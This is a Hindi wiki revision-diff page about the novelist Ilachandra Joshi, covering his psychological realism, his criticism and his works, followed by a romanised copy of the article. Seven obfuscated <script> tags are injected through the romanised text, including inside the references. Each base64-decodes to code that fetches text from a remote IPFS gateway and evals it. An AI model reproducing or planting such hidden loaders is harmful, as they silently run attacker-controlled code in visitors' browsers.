Difference between revisions of "इलाचन्द्र जोशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 3: Line 3:
  
 
इलाचन्द्र जोशी का जन्म [[अल्मोड़ा]] में [[1903]] में हुआ था। हिन्दी में मनोवैज्ञानिक उपन्यासों का आरम्भ श्री जोशी से ही होता है।  
 
इलाचन्द्र जोशी का जन्म [[अल्मोड़ा]] में [[1903]] में हुआ था। हिन्दी में मनोवैज्ञानिक उपन्यासों का आरम्भ श्री जोशी से ही होता है।  
जोशीजी ने अधिकांश साहित्यकारों की तरह अपनी साहित्यिक यात्रा काव्य-रचना से ही आरम्भ की। पर्वतीय-जीवन विशेषकर वनस्पतियों से आच्छादित अल्मोड़ा और उसके आस-पास के पर्वत-शिखरों ने और हिमालय के जलप्रपातों एवं घाटियों ने, झीलों और नदियों ने इनकी काव्यात्मक संवेदना को सदा जागृत रखा।
+
जोशी जी ने अधिकांश साहित्यकारों की तरह अपनी साहित्यिक यात्रा काव्य-रचना से ही आरम्भ की। पर्वतीय-जीवन विशेषकर वनस्पतियों से आच्छादित [[अल्मोड़ा]] और उसके आस-पास के पर्वत-शिखरों ने और [[हिमालय]] के जलप्रपातों एवं घाटियों ने, झीलों और नदियों ने इनकी काव्यात्मक संवेदना को सदा जागृत रखा।
 
==रचनाओं में मनोवैज्ञानिक यथार्थवाद==
 
==रचनाओं में मनोवैज्ञानिक यथार्थवाद==
 
{{tocright}}
 
{{tocright}}
जोशी जी एक उपन्यासकार के रूप में ही अधिक प्रतिष्ठित हैं। उनके कवि, आलोचक या कहानीकार का रूप बहुत खुलकर सामने नहीं आया। इनके उपन्यासों का आधार मनोवैज्ञानिक यथार्थवाद की संज्ञा पाता है। मनोवैज्ञानिक उपन्यासों पर ‘फ़्रायड’ के चिन्तन का अधिक प्रभाव पड़ा, किन्तु इलाचन्द्र जोशी के साथ यह बात पूरी तरह से लागू नहीं होती। जोशी जी ने पाश्चात्य लेखकों को भी बहुत पढ़ा था, पर रूसी उपन्यासकारों-टॉल्स्टॉय और दॉस्तावसकी का प्रभाव अधिक लक्षित होता है। यही कारण है कि उनके औपन्यासिक चरित्रों में आपत्तिजनक प्रतृत्तियाँ होती हैं, किन्तु उनके चरित्र नायकों में सदगुणों की भी कमी नहीं होती। उदारता, दया, सहानुभूति आदि उनके अन्दर यथेष्ट रूप में पाए जाते हैं। ये नायक इन्हीं कारणों से असामाजिक कार्य भले कर बैठते हैं, किन्तु बाद में वे पश्चाताप भी करते हैं।
+
जोशी जी एक उपन्यासकार के रूप में ही अधिक प्रतिष्ठित हैं। उनके कवि, आलोचक या कहानीकार का रूप बहुत खुलकर सामने नहीं आया। इनके उपन्यासों का आधार मनोवैज्ञानिक यथार्थवाद की संज्ञा पाता है। मनोवैज्ञानिक उपन्यासों पर ‘फ़्रायड’ के चिन्तन का अधिक प्रभाव पड़ा, किन्तु इलाचन्द्र जोशी के साथ यह बात पूरी तरह से लागू नहीं होती। जोशी जी ने पाश्चात्य लेखकों को भी बहुत पढ़ा था, पर रूसी उपन्यासकारों-टॉल्स्टॉय और दॉस्त्योवस्की का प्रभाव अधिक लक्षित होता है। यही कारण है कि उनके औपन्यासिक चरित्रों में आपत्तिजनक प्रतृत्तियाँ होती हैं, किन्तु उनके चरित्र नायकों में सदगुणों की भी कमी नहीं होती। उदारता, दया, सहानुभूति आदि उनके अन्दर यथेष्ट रूप में पाए जाते हैं। ये नायक इन्हीं कारणों से असामाजिक कार्य भले कर बैठते हैं, किन्तु बाद में वे पश्चाताप भी करते हैं।
 +
 
 +
'जैनेन्द्र , इलाचन्द्र जोशी तथा [[अज्ञेय, सच्चिदानंद हीरानन्द वात्स्यायन|अज्ञेय]] ने हिन्दी साहित्य को एक नया मोड दिया था। ये मूलतः मानव मनोविज्ञान के लेखक थे जिन्होंने हिन्दी साहित्य को बाहरी घटनाओं की अपेक्षा मन के भीतर के संसार की ओर मोडा था।.. इलाचन्द्र जोशी के अधिकतम उपन्यास उनके पात्रों के मनोलोक की गाथाएँ हैं जिनका अपने बाहरी संसार से टकराव होता है।'<ref>{{cite web |url=http://cities.sulekha.com/houston/575095/review.htm|title=याद आता है गुजरा जमाना 78|accessmonthday=24अप्रॅल|accessyear=2011|last= |first= |authorlink= |format=एचटीएमएल|publisher= |language=हिन्दी}}</ref>
  
 
==समाज में उच्चतर मूल्यों की स्थापना==  
 
==समाज में उच्चतर मूल्यों की स्थापना==  
Line 15: Line 17:
  
 
[[हिन्दी]] में मनोवैज्ञानिक उपन्यासों का प्रारम्भ श्री जोशी से ही हुआ, लेकिन श्री जोशी ने मात्र मनोवैज्ञानिक यथार्थ का निरूपण न कर अपनी रचनाओं को आदर्शपरक भी बनाया। जिस तरह [[प्रेमचन्द]] सामाजिक उपन्यासों में आदर्शोंन्मुख यथार्थवाद के लिए विख्यात हैं, उसी तरह श्री इलाचन्द्र जोशी मनोवैज्ञानिक उपन्यासकारों में अपनी आदर्शवादी मनोवैज्ञानिकता के लिए प्रशंसनीय हैं। उन्होंने वेश्याओं की तरह तथाकथित पतित नारियों में भी सुधार एवं विकास की सम्भावनाएँ ढूँढीं। इन्हें भी महिमामण्डित कर इनमें आत्मविश्वास भरने और समाज की दृष्टि में इन्हें ऊँचा उठाने का प्रयास किया।
 
[[हिन्दी]] में मनोवैज्ञानिक उपन्यासों का प्रारम्भ श्री जोशी से ही हुआ, लेकिन श्री जोशी ने मात्र मनोवैज्ञानिक यथार्थ का निरूपण न कर अपनी रचनाओं को आदर्शपरक भी बनाया। जिस तरह [[प्रेमचन्द]] सामाजिक उपन्यासों में आदर्शोंन्मुख यथार्थवाद के लिए विख्यात हैं, उसी तरह श्री इलाचन्द्र जोशी मनोवैज्ञानिक उपन्यासकारों में अपनी आदर्शवादी मनोवैज्ञानिकता के लिए प्रशंसनीय हैं। उन्होंने वेश्याओं की तरह तथाकथित पतित नारियों में भी सुधार एवं विकास की सम्भावनाएँ ढूँढीं। इन्हें भी महिमामण्डित कर इनमें आत्मविश्वास भरने और समाज की दृष्टि में इन्हें ऊँचा उठाने का प्रयास किया।
 +
==आलोचना==
 +
 +
हिन्दी कथालोचना के इस दौर में जिन लेखकों ने कथा साहित्य के अध्ययन विश्लेषण की गंभीर शुरूआत की वे [[पदुमलाल पुन्नालाल बख्शी]] और इलाचन्द्र जोशी हैं। इन दोनों ने ही विश्व साहित्य की खिड़की हिन्दी उपन्यास के नये निकले आँगन में खोली। दोनों ने ही विश्व और [[भारत]] में मुख्यतः बंगला साहित्य के परिप्रेक्ष्य में हिन्दी कथा साहित्य के मूल्यांकन की पहल की। इनमें इलाचन्द्र जोशी अपनी व्यक्तिवादी अहंवृत्ति के कारण कथा साहित्य आस्वादक कम उसके एकांगी आलोचक और दोष-दर्शक ही अधिक बने रहे। शरतचन्द्र पर लिखे गये अपने संस्मरणों में अपने अध्ययन का बखान करते हुए वे [[शरतचन्द्र]] पर जिस तरह टिप्पणी करते हैं उससे उनकी इस अहंवृत्ति को समझा जा सकता है।<ref>{{cite web |url=http://vangmaypatrika.blogspot.com/2008/03/blog-post_20.htm|title=हिन्दी कथालोचना और पदुमलाल पुन्नालाल बख्शी|accessmonthday=23अप्रॅल|accessyear=2011|last= |first= |authorlink= |format=एचटीएमएल|publisher= |language=हिन्दी}}</ref>
 +
 
 
==रचनायें==
 
==रचनायें==
 
*उपन्यास के अतिरिक्त इन्होंने हिन्दी साहित्य की अन्य विधाओं में भी योगदान दिया है। इन्होंने कहानियाँ भी लिखीं। इनके चर्चित कहानी संग्रह निम्नलिखित हैं-
 
*उपन्यास के अतिरिक्त इन्होंने हिन्दी साहित्य की अन्य विधाओं में भी योगदान दिया है। इन्होंने कहानियाँ भी लिखीं। इनके चर्चित कहानी संग्रह निम्नलिखित हैं-

Revision as of 12:50, 25 April 2011


(1903-1982)

ilachandr joshi ka janm almo da mean 1903 mean hua tha. hindi mean manovaijnanik upanyasoan ka arambh shri joshi se hi hota hai. joshi ji ne adhikaansh sahityakaroan ki tarah apani sahityik yatra kavy-rachana se hi arambh ki. parvatiy-jivan visheshakar vanaspatiyoan se achchhadit almo da aur usake as-pas ke parvat-shikharoan ne aur himalay ke jalaprapatoan evan ghatiyoan ne, jhiloan aur nadiyoan ne inaki kavyatmak sanvedana ko sada jagrit rakha.

rachanaoan mean manovaijnanik yatharthavad

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

joshi ji ek upanyasakar ke roop mean hi adhik pratishthit haian. unake kavi, alochak ya kahanikar ka roop bahut khulakar samane nahian aya. inake upanyasoan ka adhar manovaijnanik yatharthavad ki sanjna pata hai. manovaijnanik upanyasoan par ‘frayad’ ke chintan ka adhik prabhav p da, kintu ilachandr joshi ke sath yah bat poori tarah se lagoo nahian hoti. joshi ji ne pashchaty lekhakoan ko bhi bahut padha tha, par roosi upanyasakaroan-t aaulst aauy aur d aaustyovaski ka prabhav adhik lakshit hota hai. yahi karan hai ki unake aupanyasik charitroan mean apattijanak pratrittiyaan hoti haian, kintu unake charitr nayakoan mean sadagunoan ki bhi kami nahian hoti. udarata, daya, sahanubhooti adi unake andar yathesht roop mean pae jate haian. ye nayak inhian karanoan se asamajik kary bhale kar baithate haian, kintu bad mean ve pashchatap bhi karate haian.

'jainendr , ilachandr joshi tatha ajney ne hindi sahity ko ek naya mod diya tha. ye moolatah manav manovijnan ke lekhak the jinhoanne hindi sahity ko bahari ghatanaoan ki apeksha man ke bhitar ke sansar ki or moda tha... ilachandr joshi ke adhikatam upanyas unake patroan ke manolok ki gathaean haian jinaka apane bahari sansar se takarav hota hai.'[1]

samaj mean uchchatar moolyoan ki sthapana

joshi ji matr manovaijnanik yatharthavadi upanyasakar nahian kahe jaeange. unhoanne adarsh ko bhi apani kritiyoan mean sthan diya. unhoanne apani aupanyasik kritiyoan se samaj mean uchchatar moolyoan ki sthapana ka saphal prayas kiya hai. sahi hai ki unhoanne kam vasana ko bhi apane upanyasoan ka upajivy banaya hai aur veshyaoan tak ko apani kritiyoan ki nayika bana diya hai. par nari-samasyaoan ko ubharane mean bhi ve age rahe haian aur unaka samadhan bhi prastut kiya hai. ek bat yah bhi hai ki joshi ji ne any upanyasakaroan athava natakakaroan ki tarah apani kritiyoan ke lie dhirodatt nayakoan ki srishti nahian ki. unake nayak manushy ki svabhavik durbalataoan se yukt hote haian, bhale hi kalakram se ve apane adhikaansh doshoan se mukt ho jate haian aur ek adarsh vyakti ke roop mean hamare samaksh prakat hote haian.

manovaijnanik upanyasakar ‘phrayad’ ke siddhantoan se prabhavit hote haian, bhale hi joshi ji ‘phrayad’ se bahut prabhavit nahian hoan. ek bat phir bhi rah hi jati hai ki joshi ji ne un manogranthiyoan aur kuanthaoan ko pak dane ka prayas kiya hai, jo damit manobhavoan se utpann hoti haian. yahi karan hai ki unaki aupanyasik kritiyoan mean kuantha-grast patroan ki adhikata hai. sahityakar nagendr ne inhean sidhe-sidhe ‘phrayad’ se prabhavit mana hai; jainendr aur ajney ‘phrayad’ ke manovijnan se prabhavit haian, to ilachandr joshi usake manovishleshan se......ve kahian bhi manovishleshanatmak pravritti aur chhayavadi sanskaroan se ubar nahian pate....inake mukhy patr kisi-n-kisi manovaijnanik granthi ke shikar haian. jab tak unhean granthi ka rahasy nahian maloom hota, tab tak ve anek prakar ke asamajik karyoan mean sanlagn rahate haian, kintu jis kshan unaki granthiyoan ka moolodaghatan ho jata hai, usi kshan se ve samany sthiti mean pahuanch jate haian.

hindi mean manovaijnanik upanyasoan ka prarambh shri joshi se hi hua, lekin shri joshi ne matr manovaijnanik yatharth ka niroopan n kar apani rachanaoan ko adarshaparak bhi banaya. jis tarah premachand samajik upanyasoan mean adarshoannmukh yatharthavad ke lie vikhyat haian, usi tarah shri ilachandr joshi manovaijnanik upanyasakaroan mean apani adarshavadi manovaijnanikata ke lie prashansaniy haian. unhoanne veshyaoan ki tarah tathakathit patit nariyoan mean bhi sudhar evan vikas ki sambhavanaean dhooandhian. inhean bhi mahimamandit kar inamean atmavishvas bharane aur samaj ki drishti mean inhean ooancha uthane ka prayas kiya.

alochana

hindi kathalochana ke is daur mean jin lekhakoan ne katha sahity ke adhyayan vishleshan ki ganbhir shurooat ki ve padumalal punnalal bakhshi aur ilachandr joshi haian. in donoan ne hi vishv sahity ki khi daki hindi upanyas ke naye nikale aangan mean kholi. donoan ne hi vishv aur bharat mean mukhyatah bangala sahity ke pariprekshy mean hindi katha sahity ke moolyaankan ki pahal ki. inamean ilachandr joshi apani vyaktivadi ahanvritti ke karan katha sahity asvadak kam usake ekaangi alochak aur dosh-darshak hi adhik bane rahe. sharatachandr par likhe gaye apane sansmaranoan mean apane adhyayan ka bakhan karate hue ve sharatachandr par jis tarah tippani karate haian usase unaki is ahanvritti ko samajha ja sakata hai.[2]

rachanayean

  • upanyas ke atirikt inhoanne hindi sahity ki any vidhaoan mean bhi yogadan diya hai. inhoanne kahaniyaan bhi likhian. inake charchit kahani sangrah nimnalikhit haian-
  1. dhooparekha,
  2. ahuti,
  3. khandahar ki atmaean
  • inhoanne kuchh jivaniyaan bhi likhian, jinamean prasiddh haian-
  1. ravindranath
  2. sharad: vyakti aur sahityakar
  3. jivan ka mahan vishleshak viratavadi kavi gete
  • ilachandr joshi ne alochanatmak granth bhi likhe. inamean prasiddh haian-
  1. sahity sarjan,
  2. sahity chintan,
  3. vishleshan
  • joshi ji ne bal-sahity mean bhi ullekhaniy yogadan diya. kuchh anuvad kary bhi kie.
  • ve ek saphal sampadak bhi the. prayag se prakashit ‘sangam’ ka sampadan unhoanne saphalatapoorvak kiya. prasiddh patrika ‘dharmayug’ ka bhi sampadan unhoanne kuchh samay tak kiya.
  • ilachandr joshi ke pramukh upanyas is prakar haian-
  1. ghrinamayi - bad mean yahi upanyas ‘lajja’ nam se prakashit hua. ghrinamayi 1929 mean prakashit huee
  2. lajja 21 varshoan ke bad 1950 mean.
  3. sannyasi,
  4. parade ki rani,
  5. pret aur chhaya,
  6. muktipath,
  7. jipsi,
  8. jahaz ka panchhi,
  9. bhoot ka bhavishy,
  10. subah,
  11. nirvasit,
  12. rrituchakr.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. yad ata hai gujara jamana 78 (hindi) (echatiemel). . abhigaman tithi: 24aprॅl, 2011.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. hindi kathalochana aur padumalal punnalal bakhshi (hindi) (echatiemel). . abhigaman tithi: 23aprॅl, 2011.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>